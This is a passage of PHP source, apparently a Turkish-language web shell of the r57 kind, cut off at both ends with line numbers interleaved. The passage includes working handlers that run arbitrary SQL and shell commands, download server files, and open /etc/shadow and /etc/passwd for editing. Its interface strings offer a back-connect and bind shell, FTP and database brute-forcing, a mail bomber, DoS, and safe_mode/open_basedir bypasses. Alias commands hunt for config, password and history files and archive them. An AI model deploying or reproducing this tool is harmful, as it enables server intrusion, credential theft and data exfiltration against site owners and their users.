if(!$this->get_result()) return 0;

1207
1208
for($i=0;$i<$this->num_rows;$i++)

1209
1210
{

1211
1212
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}

1213
1214
$this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `",$this->columns).'`) VALUES (\''.@implode("', '",$this->rows[$i]).'\');';

1215
1216
}

1217
1218
break;

1219
1220
case 'MSSQL':

1221
1222
$this->dump[0] = '## MSSQL dump';

1223
1224
if($this->query('SELECT * FROM '.$table)!=1) return 0;

1225
1226
if(!$this->get_result()) return 0;

1227
1228
for($i=0;$i<$this->num_rows;$i++)

1229
1230
{

1231
1232
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}

1233
1234
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ",$this->columns).') VALUES (\''.@implode("', '",$this->rows[$i]).'\');';

1235
1236
}

1237
1238
break;

1239
1240
case 'PostgreSQL':

1241
1242
$this->dump[0] = '## PostgreSQL dump';

1243
1244
if($this->query('SELECT * FROM '.$table)!=1) return 0;

1245
1246
if(!$this->get_result()) return 0;

1247
1248
for($i=0;$i<$this->num_rows;$i++)

1249
1250
{

1251
1252
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}

1253
1254
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ",$this->columns).') VALUES (\''.@implode("', '",$this->rows[$i]).'\');';

1255
1256
}

1257
1258
break;

1259
1260
case 'Oracle':

1261
1262
$this->dump[0] = '## ORACLE dump';

1263
1264
$this->dump[]  = '## under construction';

1265
1266
break;

1267
1268
default:

1269
1270
return 0;

1271
1272
break;

1273
1274
}

1275
1276
return 1;

1277
1278
}

1279
1280
function close()

1281
1282
{

1283
1284
switch($this->db)

1285
1286
{

1287
1288
case 'MySQL': 

1289
1290
@mysql_close($this->connection);

1291
1292
break;

1293
1294
case 'MSSQL':

1295
1296
@mssql_close($this->connection);

1297
1298
break;

1299
1300
case 'PostgreSQL':

1301
1302
@pg_close($this->connection);

1303
1304
break;

1305
1306
case 'Oracle':

1307
1308
@oci_close($this->connection);

1309
1310
break;

1311
1312
}

1313
1314
}

1315
1316
function affected_rows()

1317
1318
{

1319
1320
switch($this->db)

1321
1322
{

1323
1324
case 'MySQL':

1325
1326
return @mysql_affected_rows($this->res);

1327
1328
break;

1329
1330
case 'MSSQL':

1331
1332
return @mssql_affected_rows($this->res);

1333
1334
break;

1335
1336
case 'PostgreSQL':

1337
1338
return @pg_affected_rows($this->res);

1339
1340
break;

1341
1342
case 'Oracle':

1343
1344
return @ocirowcount($this->res);

1345
1346
break;

1347
1348
default:

1349
1350
return 0;

1351
1352
break;

1353
1354
}

1355
1356
}

1357
1358
}

1359
1360
if(!empty($_POST['cmd']) &&$_POST['cmd']=="download_file"&&!empty($_POST['d_name']))

1361
1362
{

1363
1364
if($file=@fopen($_POST['d_name'],"r")){$filedump = @fread($file,@filesize($_POST['d_name']));@fclose($file);}

1365
1366
else if ($file=readzlib($_POST['d_name'])) {$filedump = $file;}else {err(1,$_POST['d_name']);$_POST['cmd']="";}

1367
1368
if(isset($_POST['cmd'])) 

1369
1370
{

1371
1372
@ob_clean();

1373
1374
$filename = @basename($_POST['d_name']);

1375
1376
$content_encoding=$mime_type='';

1377
1378
compress($filename,$filedump,$_POST['compress']);

1379
1380
if (!empty($content_encoding)) {header('Content-Encoding: '.$content_encoding);}

1381
1382
header("Content-type: ".$mime_type);

1383
1384
header("Content-disposition: attachment; filename=\"".$filename."\";");

1385
1386
echo $filedump;

1387
1388
exit();

1389
1390
}

1391
1392
}

1393
1394
if(isset($_GET['phpinfo'])) {echo @phpinfo();echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";die();}

1395
1396
if (!empty($_POST['cmd']) &&$_POST['cmd']=="db_query")

1397
1398
{

1399
1400
echo $head;

1401
1402
$sql = new my_sql();

1403
1404
$sql->db   = $_POST['db'];

1405
1406
$sql->host = $_POST['db_server'];

1407
1408
$sql->port = $_POST['db_port'];

1409
1410
$sql->user = $_POST['mysql_l'];

1411
1412
$sql->pass = $_POST['mysql_p'];

1413
1414
$sql->base = $_POST['mysql_db'];

1415
1416
$querys = @explode(';',$_POST['db_query']);

1417
1418
echo '<body bgcolor=#000000>';

1419
1420
if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";

1421
1422
else 

1423
1424
{

1425
1426
if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";

1427
1428
else

1429
1430
{

1431
1432
foreach($querys as $num=>$query) 

1433
1434
{

1435
1436
if(strlen($query)>5)

1437
1438
{

1439
1440
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";

1441
1442
switch($sql->query($query))

1443
1444
{

1445
1446
case '0':

1447
1448
echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";

1449
1450
break;

1451
1452
case '1': 

1453
1454
if($sql->get_result())

1455
1456
{

1457
1458
echo "<table width=100%>";

1459
1460
foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);

1461
1462
$keys = @implode("&nbsp;</b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;",$sql->columns);

1463
1464
echo "<tr><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";

1465
1466
for($i=0;$i<$sql->num_rows;$i++)

1467
1468
{

1469
1470
foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);

1471
1472
$values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]);

1473
1474
echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';

1475
1476
}

1477
1478
echo "</table>";

1479
1480
}

1481
1482
break;

1483
1484
case '2':

1485
1486
$ar = $sql->affected_rows()?($sql->affected_rows()):('0');

1487
1488
echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";

1489
1490
break;

1491
1492
}

1493
1494
}

1495
1496
}

1497
1498
}

1499
1500
}

1501
1502
echo "<br><form name=form method=POST>";

1503
1504
echo in('hidden','db',0,$_POST['db']);

1505
1506
echo in('hidden','db_server',0,$_POST['db_server']);

1507
1508
echo in('hidden','db_port',0,$_POST['db_port']);

1509
1510
echo in('hidden','mysql_l',0,$_POST['mysql_l']);

1511
1512
echo in('hidden','mysql_p',0,$_POST['mysql_p']);

1513
1514
echo in('hidden','mysql_db',0,$_POST['mysql_db']);

1515
1516
echo in('hidden','cmd',0,'db_query');

1517
1518
echo "<div align=center>";

1519
1520
echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";

1521
1522
echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";

1523
1524
echo "</form>";

1525
1526
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";die();

1527
1528
}

1529
1530
if(isset($_GET['delete']))

1531
1532
{

1533
1534
@unlink(__FILE__);

1535
1536
}

1537
1538
if(isset($_GET['tmp']))

1539
1540
{

1541
1542
@unlink("/tmp/bdpl");

1543
1544
@unlink("/tmp/back");

1545
1546
@unlink("/tmp/bd");

1547
1548
@unlink("/tmp/bd.c");

1549
1550
@unlink("/tmp/dp");

1551
1552
@unlink("/tmp/dpc");

1553
1554
@unlink("/tmp/dpc.c");

1555
1556
@unlink("/tmp/prxpl");

1557
1558
@unlink("/tmp/grep.txt");

1559
1560
}

1561
1562
if(isset($_GET['phpini']))

1563
1564
{

1565
1566
echo $head;

1567
1568
function U_value($value)

1569
1570
{

1571
1572
if ($value == '') return '<i>no value</i>';

1573
1574
if (@is_bool($value)) return $value ?'TRUE': 'FALSE';

1575
1576
if ($value === null) return 'NULL';

1577
1578
if (@is_object($value)) $value = (array) $value;

1579
1580
if (@is_array($value))

1581
1582
{

1583
1584
@ob_start();

1585
1586
print_r($value);

1587
1588
$value = @ob_get_contents();

1589
1590
@ob_end_clean();

1591
1592
}

1593
1594
return U_wordwrap((string) $value);

1595
1596
}

1597
1598
function U_wordwrap($str)

1599
1600
{

1601
1602
$str = @wordwrap(@htmlspecialchars($str),100,'<wbr />',true);

1603
1604
return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!','$1$2<wbr />',$str);

1605
1606
}

1607
1608
if (@function_exists('ini_get_all'))

1609
1610
{

1611
1612
$r = '';

1613
1614
echo '<table width=100%>','<tr><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';

1615
1616
foreach (@ini_get_all() as $key=>$value)

1617
1618
{

1619
1620
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';

1621
1622
}

1623
1624
echo $r;

1625
1626
echo '</table>';

1627
1628
}

1629
1630
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";

1631
1632
die();

1633
1634
}

1635
1636
if(isset($_GET['cpu']))

1637
1638
{

1639
1640
echo $head;

1641
1642
echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';

1643
1644
$cpuf = @file("cpuinfo");

1645
1646
if($cpuf)

1647
1648
{

1649
1650
$c = @sizeof($cpuf);

1651
1652
for($i=0;$i<$c;$i++)

1653
1654
{

1655
1656
$info = @explode(":",$cpuf[$i]);

1657
1658
if($info[1]==""){$info[1]="---";}

1659
1660
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';

1661
1662
}

1663
1664
echo $r;

1665
1666
}

1667
1668
else

1669
1670
{

1671
1672
echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';

1673
1674
}

1675
1676
echo '</table>';

1677
1678
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";

1679
1680
die();

1681
1682
}

1683
1684
if(isset($_GET['mem']))

1685
1686
{

1687
1688
echo $head;

1689
1690
echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';

1691
1692
$memf = @file("meminfo");

1693
1694
if($memf)

1695
1696
{

1697
1698
$c = sizeof($memf);

1699
1700
for($i=0;$i<$c;$i++)

1701
1702
{

1703
1704
$info = explode(":",$memf[$i]);

1705
1706
if($info[1]==""){$info[1]="---";}

1707
1708
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';

1709
1710
}

1711
1712
echo $r;

1713
1714
}

1715
1716
else

1717
1718
{

1719
1720
echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';

1721
1722
}

1723
1724
echo '</table>';

1725
1726
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">green</a> ]</b></font></div>";

1727
1728
die();

1729
1730
}

1731
1732
if(isset($_GET['dmesg(8)']))

1733
1734
{$_POST['cmd'] = 'dmesg(8)';}

1735
1736
if(isset($_GET['free']))

1737
1738
{$_POST['cmd'] = 'free';}

1739
1740
if(isset($_GET['vmstat']))

1741
1742
{$_POST['cmd'] = 'vmstat';}

1743
1744
if(isset($_GET['lspci']))

1745
1746
{$_POST['cmd'] = 'lspci';}

1747
1748
if(isset($_GET['lsdev']))

1749
1750
{$_POST['cmd'] = 'lsdev';}

1751
1752
if(isset($_GET['procinfo']))

1753
1754
{$_POST['cmd']='cat /proc/cpuinfo';}

1755
1756
if(isset($_GET['version']))

1757
1758
{$_POST['cmd']='cat /proc/version';}

1759
1760
if(isset($_GET['interrupts']))

1761
1762
{$_POST['cmd']='cat /proc/interrupts';}

1763
1764
if(isset($_GET['realise1']))

1765
1766
{$_POST['cmd'] = 'cat /etc/*realise';}

1767
1768
if(isset($_GET['service']))

1769
1770
{$_POST['cmd'] = 'service --status-all';}

1771
1772
if(isset($_GET['ifconfig']))

1773
1774
{$_POST['cmd'] = 'ifconfig';}

1775
1776
if(isset($_GET['w']))

1777
1778
{$_POST['cmd'] = 'w';}

1779
1780
if(isset($_GET['who']))

1781
1782
{$_POST['cmd'] = 'who';}

1783
1784
if(isset($_GET['uptime']))

1785
1786
{$_POST['cmd'] = 'uptime';}

1787
1788
if(isset($_GET['last']))

1789
1790
{$_POST['cmd'] = 'last -n 10';}

1791
1792
if(isset($_GET['psaux']))

1793
1794
{$_POST['cmd'] = 'ps -aux';}

1795
1796
if(isset($_GET['netstat']))

1797
1798
{$_POST['cmd'] = 'netstat -a';}

1799
1800
if(isset($_GET['lsattr']))

1801
1802
{$_POST['cmd'] = 'lsattr -va';}

1803
1804
if(isset($_GET['syslog']))

1805
1806
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';}

1807
1808
if(isset($_GET['fstab']))

1809
1810
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';}

1811
1812
if(isset($_GET['fdisk']))

1813
1814
{$_POST['cmd'] = 'fdisk -l';}

1815
1816
if(isset($_GET['df']))

1817
1818
{$_POST['cmd'] = 'df -h';}

1819
1820
if(isset($_GET['realise2']))

1821
1822
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';}

1823
1824
if(isset($_GET['hosts']))

1825
1826
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';}

1827
1828
if(isset($_GET['resolv']))

1829
1830
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';}

1831
1832
if(isset($_GET['systeminfo']))

1833
1834
{$_POST['cmd'] = 'systeminfo';}

1835
1836
if(isset($_GET['shadow']))

1837
1838
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';}

1839
1840
if(isset($_GET['passwd']))

1841
1842
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';}

1843
1844
$lang=array(

1845
1846
'tr_text1'=>'Komut Uygula',

1847
1848
'tr_text2'=>'Server uzerinde komut calistir ',

1849
1850
'tr_text3'=>'Komut istemi ',

1851
1852
'tr_text4'=>'Calisma Dizini ',

1853
1854
'tr_text5'=>'Servere Dosya Upload Et',

1855
1856
'tr_text6'=>'Yerel Dosya ',

1857
1858
'tr_text7'=>'Dizin Veya Dosya Bul ',

1859
1860
'tr_text8'=>'Sec',

1861
1862
'tr_butt1'=>'Uygula',

1863
1864
'tr_butt2'=>'Yukle',

1865
1866
'tr_text9'=>'Porta baglan /bin/bash',

1867
1868
'tr_text10'=>'Port',

1869
1870
'tr_text11'=>'Sifre Giris',

1871
1872
'tr_butt3'=>'Baglan',

1873
1874
'tr_text12'=>'Back-Connect',

1875
1876
'tr_text13'=>'IP',

1877
1878
'tr_text14'=>'Port',

1879
1880
'tr_butt4'=>'Baglan',

1881
1882
'tr_text15'=>'Uzaktan servere dosya yukle',

1883
1884
'tr_text16'=>'ile',

1885
1886
'tr_text17'=>'Uzak Dosya',

1887
1888
'tr_text18'=>'Yerel Dosya',

1889
1890
'tr_text19'=>'Exploits',

1891
1892
'tr_text20'=>'Kullan',

1893
1894
'tr_text21'=>'&nbsp;Yeni ad',

1895
1896
'tr_text22'=>'datapipe',

1897
1898
'tr_text23'=>'Yerel Port',

1899
1900
'tr_text24'=>'Uzak Host',

1901
1902
'tr_text25'=>'Uzak Port',

1903
1904
'tr_text26'=>'Kullan',

1905
1906
'tr_butt5'=>'Iste',

1907
1908
'tr_text28'=>'Guvenlik Modunda Calis',

1909
1910
'tr_text29'=>'Giris Yok ',

1911
1912
'tr_butt6'=>'Degistir',

1913
1914
'tr_text30'=>'Cat file',

1915
1916
'tr_butt7'=>'Goster',

1917
1918
'tr_text31'=>'Dosya Bulunamadi',

1919
1920
'tr_text32'=>'PHP Kod Degerlendir ',

1921
1922
'tr_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)',

1923
1924
'tr_butt8'=>'Testet',

1925
1926
'tr_text34'=>'Includes fonksiyonu ile Guvenlik modunu atlamayi test et.',

1927
1928
'tr_text35'=>'Mysql da ki yukleme dosyasi ile Guvenlik modunu atlamayi test et.',

1929
1930
'tr_text36'=>'Database[VeriTabani]',

1931
1932
'tr_text37'=>'Kullanici',

1933
1934
'tr_text38'=>'Sifre',

1935
1936
'tr_text39'=>'Tablo',

1937
1938
'tr_text40'=>'Dump database table[DB Tablosu dok]',

1939
1940
'tr_butt9'=>'Dump',

1941
1942
'tr_text41'=>'DB dosyalarini kaydet.[Dump filed]',

1943
1944
'tr_text42'=>'Dosya Duzenle ',

1945
1946
'tr_text43'=>'Dosya Duzenlemek icin',

1947
1948
'tr_butt10'=>'Kaydet',

1949
1950
'tr_text44'=>'Dosya degistirilmiyor ! YASAK ! Guvenlik Modu izin Vermiyor',

1951
1952
'tr_text45'=>'Dosya Kaydedildi',

1953
1954
'tr_text46'=>'PHP info Goster()',

1955
1956
'tr_text47'=>'Php.ini dosyasinda ki degiskenleri goster',

1957
1958
'tr_text48'=>'Temp dosylarini sil',

1959
1960
'tr_butt11'=>'Dosya Duzenle',

1961
1962
'tr_text49'=>'Server dan bu scripti sil',

1963
1964
'tr_text50'=>'CPU bilgisini incele',

1965
1966
'tr_text51'=>'Memory[hafiza] bilgisini incele]',

1967
1968
'tr_text52'=>'Metni Bul ',

1969
1970
'tr_text53'=>'Klasor Bul',

1971
1972
'tr_text54'=>'Dosyalarda ki Metni Bul',

1973
1974
'tr_butt12'=>'Bul',

1975
1976
'tr_text55'=>'Dosya Bul ',

1977
1978
'tr_text56'=>'Bulunmadi :( KeyCoder :)',

1979
1980
'tr_text57'=>'Olustur/Sil Dosya/Dizin ',

1981
1982
'tr_text58'=>'isim',

1983
1984
'tr_text59'=>'Dosya',

1985
1986
'tr_text60'=>'Dizin',

1987
1988
'tr_butt13'=>'Olustur/Sil',

1989
1990
'tr_text61'=>'Dosya Olustur',

1991
1992
'tr_text62'=>'Dizin Olustur',

1993
1994
'tr_text63'=>'Dosya Sil',

1995
1996
'tr_text64'=>'Dizin Sil',

1997
1998
'tr_text65'=>'Olustur',

1999
2000
'tr_text66'=>'Sil',

2001
2002
'tr_text67'=>'Chown/Chgrp/Chmod',

2003
2004
'tr_text68'=>'Uygula',

2005
2006
'tr_text69'=>'param1',

2007
2008
'tr_text70'=>'param2',

2009
2010
'tr_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",

2011
2012
'tr_text72'=>'Metin Bul',

2013
2014
'tr_text73'=>'Klasor Bul',

2015
2016
'tr_text74'=>'Dosya Bul',

2017
2018
'tr_text75'=>'* you can use regexp',

2019
2020
'tr_text76'=>'Metin Ara Dosyalarin icinde Arama Yoluyla',

2021
2022
'tr_text80'=>'Cesit',

2023
2024
'tr_text81'=>'Net',

2025
2026
'tr_text82'=>'Databases',

2027
2028
'tr_text83'=>'SQL Sorgusu Yap',

2029
2030
'tr_text84'=>'SQL Sorgusu',

2031
2032
'tr_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',

2033
2034
'tr_text86'=>'Download files from server',

2035
2036
'tr_butt14'=>'Download',

2037
2038
'tr_text87'=>'Download files from remote ftp-server',

2039
2040
'tr_text88'=>'server:port',

2041
2042
'tr_text89'=>'File on ftp',

2043
2044
'tr_text90'=>'Transfer mode',

2045
2046
'tr_text91'=>'Archivation',

2047
2048
'tr_text92'=>'without arch.',

2049
2050
'tr_text93'=>'FTP',

2051
2052
'tr_text94'=>'FTP-bruteforce',

2053
2054
'tr_text95'=>'Users list',

2055
2056
'tr_text96'=>'Can\'t get users list',

2057
2058
'tr_text97'=>'checked: ',

2059
2060
'tr_text98'=>'success: ',

2061
2062
'tr_text99'=>'/etc/passwd',

2063
2064
'tr_text100'=>'Send file to remote ftp server',

2065
2066
'tr_text101'=>'Use reverse (user -> resu)',

2067
2068
'tr_text102'=>'Mail',

2069
2070
'tr_text103'=>'Send email',

2071
2072
'tr_text104'=>'Send file to email',

2073
2074
'tr_text105'=>'To',

2075
2076
'tr_text106'=>'From',

2077
2078
'tr_text107'=>'Subj',

2079
2080
'tr_butt15'=>'Send',

2081
2082
'tr_text108'=>'Mail',

2083
2084
'tr_text109'=>'Hide',

2085
2086
'tr_text110'=>'Show',

2087
2088
'tr_text111'=>'SQL-Server : Port',

2089
2090
'tr_text112'=>'Test bypass safe_mode with function mb_send_mail (PHP <= 4.0-4.2.2, 5.x)',

2091
2092
'tr_text113'=>'Test bypass safe_mode, view dir list via imap_list (PHP <= 5.1.2)',

2093
2094
'tr_text114'=>'Test bypass safe_mode, view file contest via imap_body (PHP <= 5.1.2)',

2095
2096
'tr_text115'=>'Test bypass safe_mode, copy file via copy[compress.zlib://] (PHP <= 4.4.2, 5.1.2)',

2097
2098
'tr_text116'=>'Copy from',

2099
2100
'tr_text117'=>'to',

2101
2102
'tr_text118'=>'File copied',

2103
2104
'tr_text119'=>'Cant copy file',

2105
2106
'tr_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST',

2107
2108
'tr_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST',

2109
2110
'tr_text122'=>'Test bypass open_basedir, view dir list via glob (PHP <= 5.2.x)',

2111
2112
'tr_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)',

2113
2114
'tr_text124'=>'Test bypass open_basedir, add data to file via error_log[php://] (PHP <= 5.1.4, 4.4.2)',

2115
2116
'tr_text125'=>'Data',

2117
2118
'tr_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)',

2119
2120
'tr_text127'=>'Test bypass open_basedir, add data to file via readfile[php://] (PHP <= 5.2.1, 4.4.4)',

2121
2122
'tr_text128'=>'Modify/Access date(touch)',

2123
2124
'tr_text129'=>'Test bypass open_basedir, create file via fopen[srpath://] (PHP v5.2.0)',

2125
2126
'tr_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',

2127
2128
'tr_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)',

2129
2130
'tr_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)',

2131
2132
'tr_text133'=>'',

2133
2134
'tr_text134'=>'Database-bruteforce',

2135
2136
'tr_text135'=>'Dictionary',

2137
2138
'tr_text136'=>'Creating evil symlink',

2139
2140
'tr_text137'=>'Useful',

2141
2142
'tr_text138'=>'Dangerous',

2143
2144
'tr_text139'=>'Mail Bomber',

2145
2146
'tr_text140'=>'DoS',

2147
2148
'tr_text141'=>'Danger! Web-daemon crash possible.',

2149
2150
'tr_err0'=>'Error! Can\'t write in file ',

2151
2152
'tr_err1'=>'Error! Can\'t read file ',

2153
2154
'tr_err2'=>'Error! Can\'t create ',

2155
2156
'tr_err3'=>'Error! Can\'t connect to ftp',

2157
2158
'tr_err4'=>'Error! Can\'t login on ftp server',

2159
2160
'tr_err5'=>'Error! Can\'t change dir on ftp',

2161
2162
'tr_err6'=>'Error! Can\'t sent mail',

2163
2164
'tr_err7'=>'Mail send',

2165
2166
);

2167
2168
$aliases=array(

2169
2170
'----------------------------------locate'=>'',

2171
2172
'locate httpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate httpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',

2173
2174
'locate vhosts.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate vhosts.conf >> /tmp/grep.txt;cat /tmp/grep.txt',

2175
2176
'locate proftpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate proftpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',

2177
2178
'locate psybnc.conf >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate psybnc.conf >> /tmp/grep.txt;cat /tmp/grep.txt',

2179
2180
'locate my.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate my.conf >> /tmp/grep.txt;cat /tmp/grep.txt',

2181
2182
'locate admin.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate admin.php >> /tmp/grep.txt;cat /tmp/grep.txt',

2183
2184
'locate cfg.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate cfg.php >> /tmp/grep.txt;cat /tmp/grep.txt',

2185
2186
'locate conf.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate conf.php >> /tmp/grep.txt;cat /tmp/grep.txt',

2187
2188
'locate config.dat files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.dat >> /tmp/grep.txt;cat /tmp/grep.txt',

2189
2190
'locate config.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.php >> /tmp/grep.txt;cat /tmp/grep.txt',

2191
2192
'locate config.inc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.inc >> /tmp/grep.txt;cat /tmp/grep.txt',

2193
2194
'locate config.inc.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.inc.php >> /tmp/grep.txt;cat /tmp/grep.txt',

2195
2196
'locate config.default.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.default.php >> /tmp/grep.txt;cat /tmp/grep.txt',

2197
2198
'locate .conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".conf" >> /tmp/grep.txt;cat /tmp/grep.txt',

2199
2200
'locate .pwd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".pwd" >> /tmp/grep.txt;cat /tmp/grep.txt',

2201
2202
'locate .sql files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".sql" >> /tmp/grep.txt;cat /tmp/grep.txt',

2203
2204
'locate .htpasswd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".htpasswd" >> /tmp/grep.txt;cat /tmp/grep.txt',

2205
2206
'locate .bash_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".bash_history" >> /tmp/grep.txt;cat /tmp/grep.txt',

2207
2208
'locate .mysql_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".mysql_history" >> /tmp/grep.txt;cat /tmp/grep.txt',

2209
2210
'locate backup files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate backup >> /tmp/grep.txt;cat /tmp/grep.txt',

2211
2212
'locate dump files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate dump >> /tmp/grep.txt;cat /tmp/grep.txt',

2213
2214
'locate priv files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate priv >> /tmp/grep.txt;cat /tmp/grep.txt',

2215
2216
'----------------------------------tar'=>'',

2217
2218
'tar -czvf all.tgz -T /tmp/grep.txt'=>'tar -czvf all.tgz -T /tmp/grep.txt',

2219
2220
'----------------------------------1'=>'',

2221
2222
'locate access_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate access_log >> /tmp/grep.txt;cat /tmp/grep.txt',

2223
2224
'locate error_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate error_log >> /tmp/grep.txt;cat /tmp/grep.txt',

2225
2226
'locate access.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate access.log >> /tmp/grep.txt;cat /tmp/grep.txt',

2227
2228
'locate error.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate error.log >> /tmp/grep.txt;cat /tmp/grep.txt',

2229
2230
'locate ".log" files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".log" >> /tmp/grep.txt;cat /tmp/grep.txt',

2231
2232
'----------------------------------2'=>'',

2233
2234
'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt;cat /tmp/grep.txt'=>'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt',

2235
2236
'----------------------------------find'=>'',

2237
2238
'find suid files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -04000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',

2239
2240
'find suid files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -04000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',

2241
2242
'find sgid files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -02000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',

2243
2244
